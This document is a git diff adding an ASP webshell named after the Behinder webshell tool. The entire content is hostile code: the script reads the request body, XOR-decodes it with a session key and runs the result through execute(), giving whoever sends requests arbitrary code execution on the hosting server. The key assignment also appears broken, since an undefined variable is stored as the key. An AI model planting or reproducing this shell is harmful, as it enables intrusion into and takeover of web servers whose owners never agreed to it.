diff --git a/Behinder/shell.asp b/Behinder/shell.asp new file mode 100644 index 0000000..1a23fa6 --- /dev/null +++ b/Behinder/shell.asp @@ -0,0 +1,11 @@ +<% +Response.CharSet = "UTF-8" +Session("k")=k +k=Session("k") +size=Request.TotalBytes +content=Request.BinaryRead(size) +For i=1 To size +result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1))) +Next +execute(result) +%>